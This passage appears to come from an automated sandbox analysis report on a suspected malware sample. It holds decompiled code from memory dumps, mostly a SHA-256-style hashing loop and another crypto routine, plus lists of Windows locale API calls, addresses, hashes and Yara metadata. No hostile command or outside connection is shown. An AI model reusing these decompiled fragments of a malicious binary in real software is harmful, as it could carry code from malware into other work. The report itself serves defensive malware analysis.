					_t404 = 7;
					_t208 = E105BF480(_t297, _t404);
					_t209 = _v40;
					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
					_t204 = _t209 + 4;
					_t14 =  &_v12;
					 *_t14 = _v12 - 1;
					_v40 = _t204;
				} while ( *_t14 != 0);
				_v40 = _v40 & 0x00000000;
				_t563 = _v44;
				_v32 = _v60;
				_v20 = _v48;
				_v24 = _v64;
				_v16 = _v52;
				_t212 = _v56;
				_v28 = _v68;
				_t299 = 2;
				_v8 = _v56;
				_v36 = _v72;
				do {
					_t405 = 0x19;
					_t213 = E105BF480(_t212, _t405);
					_t406 = 0xb;
					_t214 = E105BF480(_v8, _t406);
					_t407 = 6;
					_t215 = E105BF480(_v8, _t407);
					_t216 = _v40;
					_t42 = _t216 + 0x4655a8; // 0x428a2f98
					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
					_v32 = _v32 + _t506;
					_t408 = 0x16;
					_t217 = E105BF480(_v36, _t408);
					_t409 = 0xd;
					_t218 = E105BF480(_v36, _t409);
					_t219 = E105BF480(_v36, _t299);
					_t568 = _v32;
					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
					_t411 = 0x19;
					_t222 = E105BF480(_t568, _t411);
					_t412 = 0xb;
					_t223 = E105BF480(_t568, _t412);
					_t413 = 6;
					_t224 = E105BF480(_t568, _t413);
					_t225 = _v40;
					_t60 = _t225 + 0x4655ac; // 0x71374491
					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
					_v24 = _v24 + _t513;
					_t414 = 0x16;
					_t226 = E105BF480(_v12, _t414);
					_t415 = 0xd;
					_t227 = E105BF480(_v12, _t415);
					_t228 = E105BF480(_v12, _t299);
					_t573 = _v24;
					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
					_t422 = 0x19;
					_t231 = E105BF480(_t573, _t422);
					_t423 = 0xb;
					_t232 = E105BF480(_t573, _t423);
					_t424 = 6;
					_t233 = E105BF480(_t573, _t424);
					_t234 = _v40;
					_t79 = _t234 + 0x4655b0; // 0xb5c0fbcf
					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
					_v28 = _v28 + _t520;
					_t425 = 0x16;
					_t235 = E105BF480(_v20, _t425);
					_t426 = 0xd;
					_t236 = E105BF480(_v20, _t426);
					_t237 = E105BF480(_v20, _t299);
					_t578 = _v28;
					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
					_t433 = 0x19;
					_t240 = E105BF480(_t578, _t433);
					_t434 = 0xb;
					_t241 = E105BF480(_t578, _t434);
					_t435 = 6;
					_t242 = E105BF480(_t578, _t435);
					_t243 = _v40;
					_t98 = _t243 + 0x4655b4; // 0xe9b5dba5
					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
					_v36 = _v36 + _t527;
					_t436 = 0x16;
					_t244 = E105BF480(_v16, _t436);
					_t437 = 0xd;
					_t245 = E105BF480(_v16, _t437);
					_t246 = E105BF480(_v16, _t299);
					_t583 = _v36;
					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
					_t444 = 0x19;
					_t249 = E105BF480(_t583, _t444);
					_t445 = 0xb;
					_t250 = E105BF480(_t583, _t445);
					_t446 = 6;
					_t251 = E105BF480(_t583, _t446);
					_t252 = _v40;
					_t117 = _t252 + 0x4655b8; // 0x3956c25b
					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
					_t254 = _v12 + _t534;
					_t447 = 0x16;
					_v12 = _t254;
					_v44 = _t254;
					_t255 = E105BF480(_v8, _t447);
					_t448 = 0xd;
					_t256 = E105BF480(_v8, _t448);
					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ E105BF480(_v8, _t299)) + _t534;
					_t588 = _v12;
					_v32 = _t454;
					_v60 = _t454;
					_t455 = 0x19;
					_t260 = E105BF480(_t588, _t455);
					_t456 = 0xb;
					_t261 = E105BF480(_t588, _t456);
					_t457 = 6;
					_t262 = E105BF480(_t588, _t457);
					_t263 = _v40;
					_t138 = _t263 + 0x4655bc; // 0x59f111f1
					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
					_t265 = _v20 + _t541;
					_t458 = 0x16;
					_v20 = _t265;
					_v48 = _t265;
					_t266 = E105BF480(_v32, _t458);
					_t459 = 0xd;
					_t267 = E105BF480(_v32, _t459);
					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ E105BF480(_v32, _t299)) + _t541;
					_t593 = _v20;
					_v24 = _t465;
					_v64 = _t465;
					_t466 = 0x19;
					_t271 = E105BF480(_t593, _t466);
					_t467 = 0xb;
					_t272 = E105BF480(_t593, _t467);
					_t468 = 6;
					_t273 = E105BF480(_t593, _t468);
					_t158 = _v40 + 0x4655c0; // 0x923f82a4
					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
					_t276 = _v16 + _t548;
					_t469 = 0x16;
					_v16 = _t276;
					_v52 = _t276;
					_t277 = E105BF480(_v24, _t469);
					_t470 = 0xd;
					_t278 = E105BF480(_v24, _t470);
					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ E105BF480(_v24, _t299)) + _t548;
					_t598 = _v16;
					_v28 = _t476;
					_v68 = _t476;
					_t477 = 0x19;
					_t282 = E105BF480(_t598, _t477);
					_t478 = 0xb;
					_t283 = E105BF480(_t598, _t478);
					_t479 = 6;
					_t284 = E105BF480(_t598, _t479);
					_t285 = _v40;
					_t180 = _t285 + 0x4655c4; // 0xab1c5ed5
					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
					_t287 = _v8 + _t555;
					_t480 = 0x16;
					_v8 = _t287;
					_v56 = _t287;
					_t288 = E105BF480(_v28, _t480);
					_t481 = 0xd;
					_t289 = E105BF480(_v28, _t481);
					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ E105BF480(_v28, _t299)) + _t555;
					_t563 = _v12;
					_t294 = _v40 + 0x20;
					_v40 = _t294;
					_t212 = _v8;
					_v36 = _t487;
					_v72 = _t487;
				} while (_t294 < 0x100);
				_t295 = _v76;
				do {
					asm("movups xmm0, [eax]");
					asm("movups xmm1, [ecx+eax]");
					asm("paddd xmm1, xmm0");
					asm("movups [eax], xmm1");
					_t295 = _t295 + 0x10;
					_t299 = _t299 - 1;
				} while (_t299 != 0);
				return 0;
			}

0x105bf543
0x105bf551
0x105bf55a
0x105bf55b
0x105bf561
0x105bf563
0x105bf574
0x105bf576
0x105bf579
0x105bf579
0x105bf57d
0x105bf582
0x105bf583
0x105bf58a
0x105bf58f
0x105bf59b
0x105bf5a0
0x105bf5a7
0x105bf5ac
0x105bf5b6
0x105bf5c3
0x105bf5c6
0x105bf5c9
0x105bf5c9
0x105bf5cd
0x105bf5cd
0x105bf5d8
0x105bf5dc
0x105bf5df
0x105bf5e5
0x105bf5eb
0x105bf5f3
0x105bf5f6
0x105bf5f9
0x105bf5ff
0x105bf600
0x105bf603
0x105bf606
0x105bf608
0x105bf60b
0x105bf617
0x105bf618
0x105bf624
0x105bf625
0x105bf635
0x105bf642
0x105bf64f
0x105bf651
0x105bf654
0x105bf655
0x105bf661
0x105bf662
0x105bf66e
0x105bf689
0x105bf68c
0x105bf693
0x105bf694
0x105bf69b
0x105bf6a0
0x105bf6a7
0x105bf6ac
0x105bf6b9
0x105bf6c8
0x105bf6d5
0x105bf6d8
0x105bf6db
0x105bf6dc
0x105bf6e5
0x105bf6e9
0x105bf6f5
0x105bf710
0x105bf715
0x105bf71a
0x105bf71b
0x105bf722
0x105bf727
0x105bf72e
0x105bf733
0x105bf740
0x105bf74f
0x105bf75c
0x105bf75f
0x105bf762
0x105bf763
0x105bf76f
0x105bf770
0x105bf77c
0x105bf797
0x105bf79c
0x105bf7a1
0x105bf7a2
0x105bf7a9
0x105bf7ae
0x105bf7b5
0x105bf7ba
0x105bf7c7
0x105bf7d6
0x105bf7e3
0x105bf7e6
0x105bf7e9
0x105bf7ea
0x105bf7f6
0x105bf7f7
0x105bf803
0x105bf81e
0x105bf823
0x105bf828
0x105bf829
0x105bf830
0x105bf835
0x105bf83c
0x105bf841
0x105bf84e
0x105bf85d
0x105bf86d
0x105bf870
0x105bf872
0x105bf873
0x105bf876
0x105bf879
0x105bf885
0x105bf886
0x105bf8ab
0x105bf8ad
0x105bf8b2
0x105bf8b7
0x105bf8ba
0x105bf8bb
0x105bf8c2
0x105bf8c7
0x105bf8ce
0x105bf8d3
0x105bf8e0
0x105bf8ef
0x105bf8ff
0x105bf902
0x105bf904
0x105bf905
0x105bf908
0x105bf90b
0x105bf917
0x105bf918
0x105bf93d
0x105bf93f
0x105bf944
0x105bf949
0x105bf94c
0x105bf94d
0x105bf954
0x105bf959
0x105bf960
0x105bf965
0x105bf97c
0x105bf98c
0x105bf992
0x105bf996
0x105bf997
0x105bf99a
0x105bf99d
0x105bf9a9
0x105bf9aa
0x105bf9cf
0x105bf9d1
0x105bf9d6
0x105bf9db
0x105bf9de
0x105bf9df
0x105bf9e6
0x105bf9eb
0x105bf9f2
0x105bf9f7
0x105bfa04
0x105bfa13
0x105bfa23
0x105bfa26
0x105bfa28
0x105bfa29
0x105bfa2c
0x105bfa2f
0x105bfa3b
0x105bfa3c
0x105bfa61
0x105bfa66
0x105bfa69
0x105bfa6c
0x105bfa74
0x105bfa77
0x105bfa7a
0x105bfa7a
0x105bfa83
0x105bfa8b
0x105bfa8b
0x105bfa8e
0x105bfa92
0x105bfa96
0x105bfa99
0x105bfa9c
0x105bfa9c
0x105bfaa9

Strings

0, xrefs: 105BF551

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
Instruction ID: 26ad7a6a090b447b3c1fed40751487fe765c3ea9b2bb3388896d2339e7db0b23
Opcode Fuzzy Hash: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
Instruction Fuzzy Hash: 3E123B36E112189BDF04CBACD956ABEB7F2EFC8314F25806AD505BB380DA757D418B84

Uniqueness

Uniqueness Score: -1.00%

Function 0042F9B4, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F9CD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
Instruction ID: 1b349e86bd2dcb401b8587f5fe98d601c7c16f63658581765740280450a0f810
Opcode Fuzzy Hash: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
Instruction Fuzzy Hash: BE41E071A006188BEB14CF55E88579EBBF4FB08314FA0853BD409E7350E3B8A924CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004223C0, Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

L/B, xrefs: 004224C6, 004224E3, 00422523, 00422610, 004226C2, 004226DF, 00422736, 004227AB, 0042282C, 0042284F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: L/B
API String ID: 0-202356071
Opcode ID: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
Instruction ID: af44c839d919a06cb4036c0461bacdbed32545edb78db0b7c7cb8e0092a3767b
Opcode Fuzzy Hash: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
Instruction Fuzzy Hash: 12E1B330A10028AFCB08CF5DE9A287E73F1FB49301755416EE582E7391DA74FA12EB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044A593, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
Instruction ID: d815766c36d9954a4c820c073ba9809893cec4c66f47e331b0827f9a13c2a0fe
Opcode Fuzzy Hash: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
Instruction Fuzzy Hash: 1F21D03258020AABFB249E25DC86BBB73A8EB04314F14407BF905C6241EB3CED55CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0044A21B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0044A7C3, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
Instruction ID: 83d8b15de60c056d1b119042d664eee472c135ad5aa1af093dd0495062aa18b7
Opcode Fuzzy Hash: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
Instruction Fuzzy Hash: 3AF04932990116ABFB246B25CC057BBBB68EB00318F14442AEC05A3240EA38FE62C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 0044A2B6, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04

Uniqueness

Uniqueness Score: -1.00%

Function 105D3228, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,105CEB8D,?,00000004), ref: 105D327B

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction ID: 43e7c81de9a73a38af273ab33b3e2d7abe4255995a299f0ed590a1ac21dccd6f
Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction Fuzzy Hash: BFF0F631A00308BBCF119FB49C06F6E7F25EB44B52F00811AFC0426392CA71AE2097D9

Uniqueness

Uniqueness Score: -1.00%

Function 105D2D3F, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E105D2D3F(void* __eflags) {
				int _t15;
				void* _t28;

				E105C09CE(0x468310, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E105CFF4B( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x46b728 = E105CE39C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(0x441e8b, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x46b728 = 0 ^  *0x46a00c;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E105D2DB7();
				return E105C0A14();
			}

0x105d2d46
0x105d2d4b
0x105d2d54
0x105d2d5a
0x105d2d6b
0x105d2d77
0x105d2d87
0x105d2d8e
0x105d2d96
0x105d2d9b
0x105d2d9e
0x105d2da5
0x105d2db1

APIs

Part of subcall function 105CFF4B: RtlEnterCriticalSection.NTDLL(?), ref: 105CFF5A

EnumSystemLocalesW.KERNEL32(00441E8B,00000001,00468310,0000000C), ref: 105D2D77

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
Instruction ID: 2124d088e411f8c24491bee9914814251905014109d5a5c2ce2af3df439601ea
Opcode Fuzzy Hash: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
Instruction Fuzzy Hash: 77F04436510704DFDB00DFB8D846B5D3BF0EB45721F104126F400DB2A1D775A5808F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00441ED1, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 0043F0DD: EnterCriticalSection.KERNEL32(-0046B510,?,0043C874,00000000,00468168,0000000C,0043C82F,00000000,?,?,0043F37B,00000000,?,00441D97,00000001,00000364), ref: 0043F0EC

EnumSystemLocalesW.KERNEL32(00441E8B,00000001,00468310,0000000C), ref: 00441F09

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
Instruction ID: dae358490f3c529fc7d89ea536994af86cc47deb2d30d84bb45738c6495eef66
Opcode Fuzzy Hash: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
Instruction Fuzzy Hash: DCF03C32A10204EFDB10EF79E856B593BB0EB08725F10412AF410DB2A1DBB999848F5E

Uniqueness

Uniqueness Score: -1.00%

Function 0044A1D0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1E5, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0043820B, Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0043837B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E

Uniqueness

Uniqueness Score: -1.00%

Function 105B3DC3, Relevance: 1.4, Strings: 1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E105B3DC3(signed int* __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int* _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t81;
				signed int _t83;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t97;
				unsigned int _t101;
				signed int _t105;
				signed int _t106;
				signed int* _t108;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;

				asm("xorps xmm0, xmm0");
				_t101 = __ecx[1];
				_t124 = __ecx[2];
				asm("movlpd [ebp-0x30], xmm0");
				_v24 = _v48;
				asm("movlpd [ebp-0x38], xmm0");
				_v20 = _v52;
				_v40 = __edx;
				_t110 = __ecx[3];
				_v44 = __ecx;
				_t105 = 0;
				_v16 = _v56;
				_v8 =  *__ecx;
				_v36 = 0;
				_v12 = _v60;
				do {
					_t81 = _v40;
					_v32 = 0x40;
					_t118 =  *(_t81 + _t105 * 8);
					_v28 =  *((intOrPtr*)(_t81 + 4 + _t105 * 8));
					_t83 = _v8;
					_t106 = _v28;
					do {
						_t129 = _t106;
						if(_t129 <= 0 && (_t129 < 0 || _t118 < 0)) {
							_v12 = _v12 ^ _t83;
							_v16 = _v16 ^ _t101;
							_v20 = _v20 ^ _t124;
							_v24 = _v24 ^ _t110;
						}
						_t87 = _v8;
						if((_t124 & 0x00000001) == 0) {
							_t125 = (_t110 << 0x00000020 | _t124) >> 1;
							_t111 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t91 = _v52;
							} else {
								_t91 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t111 | _v28;
							_t124 = _t125 | _t91;
							_t83 = (_t101 << 0x00000020 | _v8) >> 1;
							_t101 = _t101 >> 1;
						} else {
							_t127 = (_t110 << 0x00000020 | _t124) >> 1;
							_t112 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t97 = _v52;
							} else {
